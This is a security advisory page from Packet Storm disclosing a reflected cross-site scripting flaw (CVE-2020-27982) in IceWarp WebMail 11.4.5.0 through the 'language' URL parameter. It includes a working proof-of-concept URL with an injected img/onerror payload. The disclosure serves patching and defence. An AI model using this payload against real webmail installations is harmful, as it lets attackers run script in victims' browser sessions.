Lucene search

K
packetstormHarun KarakisPACKETSTORM:159763
HistoryOct 29, 2020 - 12:00 a.m.

Icewarp WebMail 11.4.5.0 Cross Site Scripting

2020-10-2900:00:00
Harun Karakis
packetstormsecurity.com
469

EPSS

0.011

Percentile

84.6%

`[+] Title: IceWarp WebMail Cross-Site Scripting Vulnerability  
[+] Date: 2020/10/25  
[+] Author: Harun Karakış  
[+] Vendor Homepage: www.icewarp.com  
[+] Tested on: Windows 10  
[+] Versions: 11.4.5.0  
[+] Vulnerable Parameter: "language" (Get Method)  
[+] Vulnerable File: /webmail/  
[+] Cve:CVE-2020-27982  
  
# PoC:  
  
[+] Go to : http://localhost/webmail/  
or  
  
[+] Add the "language" parameter to the URL and write malicious code, Example: http://localhost/webmail/?language="><img src=x onerror=alert(1)>  
  
[+] When the user goes to the URL, the malicious code is executed  
  
Example Vulnerable URL: http://localhost/webmail/?language="><img src=x onerror=alert(1)> (Payload: "><img src=x onerror=alert(1)>)  
  
example picture  
https://i.hizliresim.com/FBcSbW.png  
`

EPSS

0.011

Percentile

84.6%

Related for PACKETSTORM:159763